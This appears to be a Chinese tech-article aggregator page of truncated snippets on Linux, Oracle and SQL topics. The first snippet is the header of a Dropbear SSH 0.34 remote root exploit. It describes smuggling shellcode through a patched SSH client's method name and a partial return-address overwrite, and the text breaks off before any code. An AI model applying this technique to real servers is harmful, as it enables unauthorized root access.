热门标签： c c# c++ asp asp.net linux php jsp java vb Python Ruby mysql sql access Sqlite sqlserver delphi javascript Oracle ajax wap mssql html css flash flex dreamweaver xml

Linux x86 Dropbear SSH <= 0.34 remote root exploit

/*
* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Con ......

linux程式段错误的调试方法

原帖：http://www.sudu.cn/info/html/edu/20070101/286290.html
简而言之,产生段错误就是访问了错误的内存段，一般是你没有权限，或根本就不存在对应的物理内存,尤其常见的是访问0地址.
一
般来说,段错误就是指访问的内存超出了系统所给这个程式的内存空间，通常这个值是由gdtr来保存的，他是个48位的寄存器，其中的32位是保存由他指
向的gdt表，后13位保存相应于gdt的下标，最后3位包括了程式是否在内存中及程式的在cpu中的运行级别,指向的gdt是由以64位为一个单位的
表，在这张表中就保存着程式运行的代码段及数据段的起始地址及和此相应的段限和页面交换更有程式运行级别更有内存粒度等等的信息。一旦一个程式发生了
越界访问，cpu就会产生相应的异常保护，于是segmentation
fault就出现了.
在编程中以下几类做法容易导致段错误,基本是是错误地使用指针引起的
1)访问系统数据区，尤其是往
系统保护的内存地址写数据

最常见就是给一个指针以0地址
2)内存越界(数组越界，变量类型不一致等)
访问到不属于你的内存区域
解决方法
我
们在用C/C++语言写程式的时侯，内存管理的绝大部分工作都是需要我们来做的。实际上，内存管理是个 ......

Linux 探索

转：http://www.nounix.com/linux-explore-the-legend-of-the-beginning-of-the-first-act-14577/
<Linux 探索>
的目的是帮助您认识Linux 这个博大精深的操作系统产品，如果您带着想成为专家或者顶尖Linux 人物来看本文的话，您肯定要失望了。因为我自己也还是Linux 的初学者，怎么能够写出让您成为高手的文章？（笑）不过愿望总是好的，大家一起努力吧！加油！
ok，现在请您看看您是属于下面哪种类型的人：
1 ：根本不知道什么是Linux，但是知道Windows；
2 ：可以拼写出Linux 这个单词，知道是一种和Windows 操作系统相关的产品但仅此而已；
3 ：知道Linux 是干什么的，有什么用处，而且也准备学习Linux 了；
4 ：您是一位准备考取RHCE证书的学生或者工作者，以便提高您的竞争力；
5 ：您对于技术总是有一种向往，喜欢研究新的技术，接触新的领域；
如果您是属于上面五种中的任何一种，那么本系列文章适合您的阅读，您能从中得到许多乐趣。我不能保证您看完本系列文章之后，能够成为一个合格的
RHCE （RHCE：Red Hat Certified Engineer.RedHat Linux
应用的一种水平认证，关于RHCE认证将有章节详细描述），但是能够保证您不会被别人对于Linux
的� ......

高手进阶必读：Linux内核的同步机制

http://www.jz123.cn/Article/13/155/2006/2006021915981.html
高手进阶必读：Linux内核的同步机制
本文详细的介绍了Linux内核中的同步机制：原子操作、信号量、读写信号量和自旋锁的API，使用要求以及一些典型示例
一、引言
在现代操作系统里，同一时间可能有多个内核执行流在执行，因此内核其实象多进程多线程编程一样也需要一些同步机制来同步各执行单元对共享数据的访问。尤其是在多处理器系统上，更需要一些同步机制来同步不同处理器上的执行单元对共享的数据的访问。
在主流的Linux内核中包含了几乎所有现代的操作系统具有的同步机制，这些同步机制包括：原子操作、信号量（semaphore）、读写信号量
（rw_semaphore）、spinlock、BKL(Big Kernel
Lock)、rwlock、brlock（只包含在2.4内核中）、RCU（只包含在2.6内核中）和seqlock（只包含在2.6内核中）。
二、原子操作
所谓原子操作，就是该操作绝不会在执行完毕前被任何其他任务或事件打断，也就说，它的最小的执行单位，不可能有比它更小的执行单位，因此这里的原子实际是使用了物理学里的物质微粒的概念。
原子操作需要硬件的支持，因此是架构相关的，其API和原子类型的定义都定义在内核源码树的include/as ......

oracle客户端连接PL/SQL

oracle客户端连接PL/SQL
下载客户端到某个路径
修改配置文件
D:\oracle\product\10.2.0\db_1\NETWORK\ADMIN\tnsnames.ora
# tnsnames.ora Network Configuration File: D:\oracle\product\10.2.0\db_1\network\admin\tnsnames.ora
# Generated by Oracle configuration tools.
SQLCLUB =
(DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.1.X)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = sqlclub.com)
    )
)
aaa=
(DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.1.X)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = aaa.com)
    )
)
EXTPROC_CONNECTION_DATA =
(DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = IPC ......

SQL中IN,NOT IN,EXISTS,NOT EXISTS的用法和差别

SQL中IN,NOT IN,EXISTS,NOT EXISTS的用法和差别:
IN:确定给定的值是否与子查询或列表中的值相匹配。
IN 关键字使您得以选择与列表中的任意一个值匹配的行。
当要获得居住在 California、Indiana 或 Maryland 州的所有作者的姓名和州的列表时，就需要下列查询：
SELECT ProductID, ProductName from Northwind.dbo.Products WHERE CategoryID = 1 OR CategoryID = 4 OR CategoryID = 5
然而，如果使用 IN，少键入一些字符也可以得到同样的结果：
SELECT ProductID, ProductName from Northwind.dbo.Products WHERE CategoryID IN (1, 4, 5)
IN 关键字之后的项目必须用逗号隔开，并且括在括号中。
下列查询在 titleauthor 表中查找在任一种书中得到的版税少于 50% 的所有作者的 au_id，然后从 authors 表中选择 au_id 与
titleauthor 查询结果匹配的所有作者的姓名：
SELECT au_lname, au_fname from authors WHERE au_id IN (SELECT au_id from titleauthor WHERE royaltyper < 50)
结果显示有一些作者属于少于 50% 的一类。
NOT IN:通过 NOT IN 关键字引入的子查询也返回一列零值或更多值。
以下查询查找没有出版过商业书籍的出版商的名称。
SELECT pub_ ......